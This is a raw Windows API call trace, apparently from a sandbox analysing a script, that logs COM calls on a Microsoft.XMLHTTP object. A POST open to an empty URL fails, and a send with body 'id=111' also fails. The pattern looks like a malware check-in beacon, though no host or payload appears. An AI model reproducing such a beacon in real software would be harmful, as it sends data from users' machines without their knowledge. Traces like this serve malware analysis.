	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x629bd0) returned 0x0
	[0214.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x629bd0) returned 0x0
	[0214.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.999] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x629bd0) returned 0x0
	[0215.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0215.000] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x629bd0) returned 0x0
	[0215.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0215.000] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x2
	[0215.000] longjmp () 
	[0215.000] longjmp () 
	[0215.000] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0215.000] SysStringLen (param_1=0x0) returned 0x0
	[0215.000] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0215.001] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0215.001] ??2@YAPEAX_K@Z () returned 0x62b540
	[0215.001] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62b540) returned 0x0
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x62b540) returned 0x0
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x62b540) returned 0x0
	[0215.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.001] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x62b540) returned 0x0
	[0215.002] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0215.002] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0215.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x62b540) returned 0x0
	[0215.002] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0215.002] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0215.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0215.002] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0215.002] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x2
	[0215.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0215.002] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x2
	[0215.002] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.002] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7500, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x460000, varVal2=0x0), [1]=0x62a470*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4689c8*(varType=0x8, wReserved1=0x36, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x28e878), varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x460000, varVal2=0x0), [1]=0x62a470*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4689c8*(varType=0x8, wReserved1=0x36, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x28e878), varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80070057), puArgErr=0x28da10*=0x0) returned 0x80020009
	[0215.003] longjmp () 
	[0215.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0215.003] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0215.003] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x2
	[0215.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0215.003] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c7500, dispIdMember=5, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ad40*(varType=0x8, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1="id=111", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ad40*(varType=0x8, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1="id=111", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource="msxml3.dll", bstrDescription="Unspecified error\r\n", bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x80004005), puArgErr=0x28da10*=0x0) returned 0x80020009
	[0215.133] longjmp () 
	[0215.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0215.133] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0215.133] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x2
	[0215.133] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
